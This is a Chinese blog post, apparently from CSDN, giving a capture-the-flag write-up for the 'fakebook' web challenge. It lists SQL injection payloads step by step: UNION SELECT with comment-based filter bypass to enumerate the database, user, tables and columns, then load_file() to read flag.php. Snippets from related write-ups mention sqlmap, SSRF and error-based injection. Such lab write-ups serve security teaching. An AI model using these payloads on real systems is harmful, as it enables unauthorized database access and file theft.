攻防世界-Web-fakebook

最新推荐文章于 2024-07-24 10:35:36 发布
最新推荐文章于 2024-07-24 10:35:36 发布
阅读量200 收藏
点赞数
分类专栏: WriteUp 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39091609/article/details/108512043
版权

0x01

根据提示注册一个用户,blog的位置需要输入一段网址才能通过注册。注册成功以后可以查看用户信息。
在这里插入图片描述
通过?no=1 and 1=1?no=1 and 1=2可以验证存在SQL注入漏洞,接下来尝试注入。

0x02

使用?no=1 union/**/select 1,2,3,4可以判断该表中存在4个字段
使用?no=1 and 0 union/**/select 1,2,3,4可以判断有回显的字段是第二个
使用?no=1 and 0 union/**/select 1,database(),3,4可以查出当前数据库是fakebook
使用?no=1 and 0 union/**/select 1,user(),3,4显示当前用户是root@localhost
使用?no=1 and 0 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'查到当前数据库中有一个users表
使用?no=1 and 0 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' and table_name='users'查出users表中有no,username,passwd,data这几个字段

0x03

这道题的flag没有明说在哪个位置,但是通过扫描发现有一个flag.php的页面,所以接下来就需要读取这个页面的内容。配合刚刚注入时发现的MySQL用户是root,这就可以尝试使用SQL中的load_file()函数来读取文件,payload如下:
?no=0 union/**/select 1,load_file("/var/www/html/flag.php"),3,4
在浏览器里可以查看到flag:
在这里插入图片描述

uh3ng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web进阶笔记
weixin_43928140的博客
06-03 1833
0x02 NaNNaNNaNNaN-Batman 首先下载附件得到web100,用notepad++打开看下,是一些js乱码 我把源码贴到下面 <script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg...
攻防世界】web
qq_63458510的博客
02-12 305
1、 按Ctrl+U找出flag 2、 神马是robots协议? f1ag_1s_h3re.php 找到一个带flag的 ,就把它加入到链接后面 就找到flag了 3、 用记事笔记本打开 就找出来flag了 4、 因为这是关于cookie的,所以就在链接后加上cookie.php 得到无响应,看不到结果 打开开发者工具模式,找到网络这一项里面的消息头 就可以找到flag 5、 用64位编码解密即可用64位编码解密即可 ...
攻防世界-fakebook
Welcome To Myon'Blog !
10-04 722
name、age、blog为data反序列化值,blog读取成功会返回url值。显示的是注册用户信息,观察url发现no=1,猜测存在注入。即:/var/www/html/flag.php。我们一般还会对条件进行限制,指定查哪个数据库下的。我们可以通过反序列化来实现ssrf读取任意文件。用单引号测试一下,报错,确实存在SQL注入。尝试联合查询注入,发现存在过滤。这里要使用内联注释/**/绕过。可以看到存在一个叫uses的表。尝试使用大小写绕过,发现不行。5的时候报错,说明有4列。可以看到结果就少了几个。
攻防世界-fakebook-(详细操作)做题过程
qq_43715020的博客
06-20 4702
攻防世界-fakebook-(详细操作)做题过程
攻防世界——fakebook
m0_62063669的博客
06-22 1807
攻防世界——fakebook /user.php.bak发现一个PHP文本,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://注册成功 点击username里的1url中有no=1,可以尝试一下,是否有注入(and 1=1不报错,and 1=2报错,所以存在sql注入) order by 4不报错,order by 5报错,所以有四个字段尝试查询数据库名,然后被拦截 尝试绕过,/**/可以绕过,发现2是回显点 得到当前数据库为fakebook ......
攻防世界fakebook的一次解题过程(萌新拙见)
tht03553的博客
10-26 461
发现这个用户的权限是一个超级用户,权限很高,这是就可以使用一个非常规的方法,比较简单,就是利用mysql里的load_file()函数,该函数的作用是访问系统文件,并且将其用字符串的方式返回,不过其条件比较苛刻,需要文件的绝对路径和高级权限,但是,我们刚好满足这些条件,所以构造payload。发现只有一个注册和登录的按钮,在正式攻击这个靶场前,先进行信息收集,利用扫描工具来扫描这个网站的后台网页,看有没有漏掉的信息,这里我用的是御剑扫描,对于一些不想下命令工具的朋友来说,御剑算是一个不错的选择。
攻防世界(Web进阶区)——fakebook
垃圾管理员的垃圾站
04-09 6515
这个思路可能并不是靶场原本想要让用户做的,但也无妨吧,怎样不是做呢。象棋高手总结了几十年的经验,也可能会输给新入门的新手。新手经验不足,更不谈什么战术,无心的一步棋,可能会让老者思前顾后,露出弱点。 进入靶场: 除了一个login登陆按钮,还有一个join注册按钮。开始之前,一般习惯性的扫描下目录,看看有什么。如果大家经常刷题,可以自己写一个目录扫描工具,然后自己整理一套刷题的...
fakebook-backend:学习个人项目探索MERN堆栈
04-10
Fakebook后端(express和mongodb)(这是一个学习/探索MERN堆栈的个人项目)入门: 确保已安装节点克隆仓库在fakebook文件夹中,创建一个带有dev.env文件的配置文件夹设置环境变量:PORT:value,MONGODB_URL = ...
Fakebook-Day2:在第2天之后,在完善蓝图功能之前
03-31
在“Fakebook-Day2:在第2天之后,在完善蓝图功能之前”这个项目中,我们主要探讨的是如何利用Python编程语言来构建一个类似Facebook的社交网络平台。在第二天的开发阶段,我们的重点在于完善项目的蓝图(Blueprint)...
fakebook:Facebook的克隆
05-23
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
1713010552田靖宇-8月13日日志1
08-04
这篇日志记录的是一个关于信息安全实训的过程,作者在探索一个名为"fakebook"的系统时,发现了多个安全漏洞。以下是对这些知识点的详细说明: 1. **POST注入**:作者在注册账号过程中发现了一个POST注入漏洞。这...
mp12_social_network_fakebook_person
05-15
Mp12-社交网络(Fakebook)(人)[ManyToMany] 该应用程序将具有一个名为Person的实体,可以通过/ persons端点进行管理。 帖子将添加一个人,获取将显示所有这些人。 为了使一个人与另一个人成为朋友,我们将向终端...
攻防世界XCTF:fakebook
末初的CSDN博客
03-14 6200
再注册账号时,发现了个post注入 目录扫描一下,存在robots.txt和flag.php 源码: Get()方法并没有对获取过来的url进行任何的过滤所以这里存在SSRF 这里存在一个get注入 从报错中可以看出网站绝对路径/var/www/html 使用updatexml报错注入查询信息 这里concat()注入还是有很多不方便,使用make_set()进行注入 综合...
攻防世界-高手进阶区之Fakebook
Sacrifice_li的博客
06-11 811
进来页面看到的是这样的东西: 然后先去随便点一下看看东西,这里有个join,想要注册一下内容,但是这个blog的格式不对的话就没办法join 这里就暂时没有什么思路了。 接下来去看看目录有哪些东西: 用kali的dirb或者nikto: 里面有一个bak文件,下载下来解压看一看: 然后大致查阅了一下内容,是说创建user然后从url里get信息,同时blog有一个正则匹配,需要有https://(可有可无),然后是数字和字符,加一个. 然后是2-6个字母,所以随便构造一个h.
攻防世界-web-fakebook-从0到1的解题历程writeup
CTF小白的博客
04-13 4189
题目分析 拿到题目发现有注册登录界面,一般给了注册界面的很少会是sql注入登陆界面的,所以尝试先注册一个账号。 发现这边会加载注册时填写的blog地址,并将内容加载到一个iframe中。 这时发现网址为 http://159.138.137.79:55692/view.php?no=1 感觉就是有sql注入漏洞,虽然不知道考点在不在这,但是先注了再说。 尝试了一下就发现是数字型注入 sqlm...
攻防世界web进阶区fakebook详解
hxhxhxhxx的博客
07-24 767
攻防世界web进阶区fakebook详解题目详解tips 题目 详解 注册框很可疑,我们抓包,sqlmap一把梭 python2 sqlmap.py -r wuzi.txt 发现了五个数据库,但是很可惜,都没有我们想要的flag,当我们查看fakebook的内容时,发现是用序列化来存储的 到这里我们思路就断了, 我们再来御剑一把梭 打开flag.php发现并没有什么作用,那么我们继续扫描 这时候,在robots.txt中发现了备份文件 <?php class UserInfo
攻防世界:fakebook
qq_46230755的博客
01-10 225
打开后注册一个账户,进入个人主页 发现上面存在注入点,先试一下改点数字 发现存在报错 尝试输入 view.php?no=1 and 1=1# view.php?no=1 and 1=2# 第一个显示正常,第二个报错,确定存在注入 开始注入的测试,第一步查 存在的字段,利用order by联合查询,发现5不存在,所以应该为4位字段数。 view.php?no=1 order by 5# 接着利用联合查询语句想找哪个字段可以回显利用,为了不让我们构造的select语句与原来语句的结果混在一起,将原
攻防世界-app3
SNAKEのBlog
07-24 1870
所需工具 jadx android-backup-extractor DB Browser for SQLite 艰辛的过程 拿到程序,发现是ab结尾的文件,就上网搜了一下,发现是android应用的备份文件,需要用android-backup-extractor里的abe.jar将数据提取出来 java -jar abe.jar unpack app3.ab app3.tar 接下来解...
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
最新发布
lupai的博客
07-24 428
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1074
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值